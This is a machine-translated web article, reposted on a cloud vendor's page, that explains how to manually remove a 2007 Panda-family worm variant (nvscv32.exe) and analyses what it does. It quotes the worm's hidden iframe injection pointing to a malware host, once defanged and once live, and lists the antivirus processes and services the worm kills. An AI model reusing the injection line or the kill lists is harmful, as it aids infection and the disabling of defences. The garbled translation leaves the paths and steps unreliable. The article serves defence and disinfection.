Manual cleanup scheme of the Bear Cat's Burn-in virus nvscv32.exe Variant

Source: Internet
Author: User

Editor's note:PConline providesBear Cat burn-in virus nvscv32.exe Variant. It was investigated that this variant appeared on the 16th. The pen is lucky to be in close contact with the maid nvscv32.exe variant on the 17th, and use the following methods to clear it. The first method is recommended.

Related links:
Pandatv virus exclusive and manual repair solution-applicable to readers of the virus process spoclsv.exeand fuckjacks.exe. The virus process in this article is nvscv32.exe.

I. solutions provided by PConline

1. Unplug the network cable;

2. re-enter WinXP security mode. The pandatv virus process is not loaded. You can use "Task Manager "! (Note: Press F8 after the instance is started)

3. Delete the Virus File: %systemroot1_system32driversvscv32.exe.

4. Start Menu => run and run the msconfig command. In the prepare System Configuration example, remove processes related to nvscv32.exe. You can also use the Super Rabbit magic to set hijackthisand Delete the Registry Startup entry of nvscv32.exe.

Cancel startup of pandatv virus Process

5. download and use the Jiangmin killing tool to repair the infected exe file. Install windows patches in a timely manner.

6. Clear html, asp, php, and so on. The following code is contained in all webpage files: (To prevent code propagation from being modified in three ways, please "." For ".")

<Iframe src = http: // www. Krvkr. Com/worm. Htm width = "0" height = "0"> </iframe>

  Batch cleanup of malicious code:

  • You can use Dreamweaver to replace them in batches.

How to use Dreamweaver batch replacement

  • You can download and use BatchTextReplacer for batch replacement.
  • An enterprise deployed with Symantec AntiVirus can scan the full file in the latest virus database to clear the added malicious code and virus files.

7. install anti-virus software, upgrade the virus database, scan the entire hard disk, and clear other virus files. We recommend the "Free Kaspersky" -- Active Virus Sheild recommended multiple times by PConline. (Xxxxxxxxxxxxx) (Note: Steps 7 cannot be changed with Step 5 to prevent the repaired files from being deleted !)

8. Delete the autorun. inf file under each root directory, and delete all Desktop _. ini files using the search function.

2. solutions provided by the Internet Security Network (the following virus descriptions, poisoning phenomena, and technical analysis are from the Internet Security Network)

1: disable network sharing and disconnect the network.

2: Use icesword.exe to remove nvscv32.exe processes (fast, before Virus Infection with IceSword)

3: HKEY_LOCAL_MACHINESOFTWAREMicrosoftwindowsCurrentVersion
The value of assumeradvancedfolderhiddenshowall CheckedValue is changed to 1.

4: Delete the Registry Startup item

[HKEY_CURRENT_USERSoftwareMicrosoftwindowsCurrentVersionRun]

Nvscv32: "C: windowssystem32driversvscv32.exe"

5. Delete C: windowssystem32driversvscv32.exe.

6. Delete the autorun.inffile and setup.exe file under each root directory and delete all Desktop _. ini files using the search function.

7. If there is a script file on the Computer, delete all the virus code.

8: Disable the automatic playback function of the system.

In this way, the virus is basically cleared.

Iii. Virus description

After a file containing a virus is run, the virus copies itself to the system directory, modifies the registry, sets itself as the boot entry, traverses each drive, and writes itself to the root directory of the disk, add an Autorun. inf file that enables the user to activate the virus body when opening the disk. Then, the virus runs a thread to infect local files, scan other computers on the LAN, and start another thread to connect to a website to download Trojans to launch malicious attacks.

File Name: nvscv32.exe
Virus name: currently, antivirus software cannot be killed (virus samples have been reported to antivirus vendors)
Chinese name: (nanya, pandatv)
Virus size: 68,570 bytes
Language: Borland Delphi 6.0-7.0
Shelling method: FSG 2.0-> bart/xt
Time detected: 2007.1.16
Hazard level: high

Iv. Poisoning

1: The setup.exe and autorun. inf files exist in the root directory of each system partition (disks A and B are not infected ).

2: You cannot manually modify "Folder Options" to display hidden files.

3: The Hidden top_ini file is displayed in each infected folder. The file contains the infected date, for example, 2007-1-16.

4: Add the following code to all script files on your computer: <iframe src = http://www.krvkr.com/worm.htm width = "0" height = "0"> </iframe>

5: common anti-virus software and firewalls on infected machines cannot be enabled and run properly.

6: you cannot normally use the task manager, sreng.exe, and other tools.

7: send packets to other machines on the LAN without reason.

V. Technical Analysis

1: After the virus file is run, copy it to systemroot=system32driversvscv32.exe.

Create a registry auto-Start entry:

[HKEY_CURRENT_USERSoftwareMicrosoftwindowsCurrentVersionRun]

Nvscv32: "C: windowssystem32driversvscv32.exe"

2: Search for the virus in the anti-virus form to end the related process:

  • Skynet Firewall
  • Virusscan
  • Symantec antivirus
  • System safety monitor
  • System repair engineer
  • Wrapped gift killer
  • Game Trojan Detection master
  • Super patrol

3: Stop the following processes

  • Mcshield.exe
  • Vstskmgr.exe
  • Naprdmgr.exe
  • Updaterui.exe
  • Tbmon.exe
  • Scan32.exe
  • Ravmond.exe
  • Ccenter.exe
  • Ravtask.exe
  • Rav.exe
  • Ravmon.exe
  • Ravmond.exe
  • Ravstub.exe
  • Kvxp. kxp
  • Kvmonxp. kxp
  • Kvcenter. kxp
  • Kvsrvxp.exe
  • Kregex.exe
  • Uihost.exe
  • Trojdie. kxp
  • Frogagent.exe
  • Kvxp. kxp
  • Kvmonxp. kxp
  • Kvcenter. kxp
  • Kvsrvxp.exe
  • Kregex.exe
  • Uihost.exe
  • Trojdie. kxp
  • Frogagent.exe
  • Logocmd.exe
  • Logo_1.exe
  • Rundl132.exe
  • Taskmgr.exe
  • Msconfig.exe
  • Regedit.exe
  • Sreng.exe

4. Disable the following services:

  • Schedule
  • Sharedaccess
  • Rsccenter
  • Rsravmon
  • Rsccenter
  • Kvwsc
  • Kvsrvxp
  • Kvwsc
  • Kvsrvxp
  • Kavsvc
  • Avp
  • Avp
  • Kavsvc
  • Mcafeeframework
  • Mcshield
  • Mctaskmanager
  • Mcafeeframework
  • Mcshield
  • Mctaskmanager
  • Navapsvc
  • Wscsvc
  • Kpfwsvc
  • Sndsrvc
  • Ccproxy
  • Ccevtmgr
  • Ccsetmgr
  • Spbbcsvc
  • Symantec core lc
  • Npfmntor
  • Mskservice
  • Firesvc

5. Delete the following registry items:

  • Softwaremicrosoftwindowscurrentversionunavtask
  • Softwaremicrosoftwindowscurrentversionunkvmonxp
  • Softwaremicrosoftwindowscurrentversionunkav
  • Softwaremicrosoftwindowscurrentversionunkavpersonal50
  • Softwaremicrosoftwindowscurrentversionunmcafeeupdaterui
  • Softwaremicrosoftwindowscurrentversionunetwork associates error reporting service
  • Softwaremicrosoftwindowscurrentversionunshstatexe
  • Softwaremicrosoftwindowscurrentversionunylive.exe
  • Softwaremicrosoftwindowscurrentversionunyuncse

6: infect all executable files and change the icon to (this is not the icon of pandatv)

7. Skip the following directories:

  • Windows
  • Winnt
  • Systemvolumeinformation
  • Recycled
  • Windowsnt
  • Windowsupdate
  • Windowsmediaplayer
  • Outlookexpress
  • Netmeeting
  • Commonfiles
  • Complusapplications
  • Commonfiles
  • Messenger
  • Installshieldinstallationinformation
  • Msn
  • Microsoftfrontpage
  • Moviemaker
  • Msngaminzone

8: Delete the *. gho backup file.

9: The driver root directory is set up as the sub-file setup.exe

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.